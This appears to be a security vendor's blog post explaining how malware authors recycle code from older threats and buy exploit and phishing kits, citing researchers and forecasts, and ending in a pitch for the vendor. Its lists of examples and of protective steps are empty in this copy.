Developers are known for reusing pieces of code over and over again – after all, if it isn’t broke, why fix it? In fact, this is what makes open source programs so popular and valuable – as opposed to having to create completely new code, developers can utilize existing open source code, and can leverage it in a way that fits their current needs.
Unfortunately, this approach isn’t only used by software developers and other white hats – hackers have also recycled and repacked older exploits that worked well in the past to create a completely new threat. Worse still, many of these reused threats are leveraged in combination with new and sophisticated infection strategies, making them even more difficult to protect against.
Most new malware isn’t new
With all the different statistics coming out about new malware, it’s easy to assume that the internet and connected systems are flooded with threats. In fact, G Data reported that 22 million new malware samples were identified during Q1 of 2017. To put it another way, this means that a new threat was found almost every 4 seconds.
While it’s certainly true that there are a considerable number of malware samples available for hackers to choose from, many of these aren’t exactly new.
“Most of it is actually a Frankenstein-version that consists of chunks of code that have been pieced together from existing malware or publicly released vulnerabilities and tools,” Secplicity pointed out.
In this way, hackers leverage existing code and capabilities, and build upon these with unique functions to establish a new malware sample.
Motivations for reuse
There are several reasons why this reuse and recycling approach is popular among hackers. First and foremost, it saves them time. Instead of having to create new code for a basic function, it’s much faster and easier to use a section of code that the hacker knows already works. What’s more, as security analyst Marc Laliberte pointed out, saving time in this way enables cybercriminals to direct their attention to more pressing pursuits.
“Why reinvent the wheel when another author already created a working solution?” Laliberte wrote. “By copying code wherever possible, malware authors have more time to focus on other areas, like detection avoidance and attribution masking.”
In addition to reusing code to save time, many cybercriminals will also recycle top threat capabilities simply because they’ve shown to be successful in the past. This is why there are countless variants of ransomware, spear-phishing campaigns and other tactics.
Making code available: Malware and exploit kits
It’s also become incredibly simple for hackers to access and reuse code thanks to available sources like malware and exploit kits. These kits package threats and code into a single package, and are often offered for sale on underground marketplaces or hosted on compromised websites.
For instance, Sensors Tech Forum contributor Milena Dimitrova reported that researchers who examined 66,000 URLs and over 7,800 phishing kits discovered two kits in particular that were in place within more than 30 compromised hosts.
In addition to selling the kits themselves, some hackers also provide back-doored kits, allowing other cybercriminals to access previously compromised hosts.
Frankenstein-style malware can be insidious.Examples of reuse
Let’s take a look at a few cases wherein hackers borrowed code from another malware author:
|
|
Threat reuse on the horizon
According to predictions from Trend Micro’s 2018 report, it doesn’t appear that this style of threat reuse will stop anytime soon. In fact, experts forecast that familiar infection techniques like those used to spread email and web-based spam will resurface in connection with the fake news triangle.
“From spear-phishing emails sent to foreign ministries to the blatant use of documents to discredit authorities, dubious content can spread freely and spark forceful opinions or even real protests,” the 2018 Security Predictions Report stated. “Manipulated political campaigns will continue to mount smear tactics and deliberately shift public perception, as allowed by the tools and services readily available in underground marketplaces. It is likely that the upcoming Swedish general election will not be exempt from attempts to influence the voting outcome through fake news.”
This makes hackers’ capabilities even more potentially damaging than before. Because threats are now available on underground marketplaces, hackers no longer need specific coding skills – they can simply purchase a pre-built threat and reuse it with minor modifications to reduce the chances of detection.
New threats built using the capabilities of old infections create dangerous malware samples.Protecting against new and old threats
Because new threats will continue to reuse previously established tactics, it’s important that organizations take the proper steps to protect their brands, their technological investments and their critical data:
|
|
To find out more, connect with the experts at Trend Micro today.
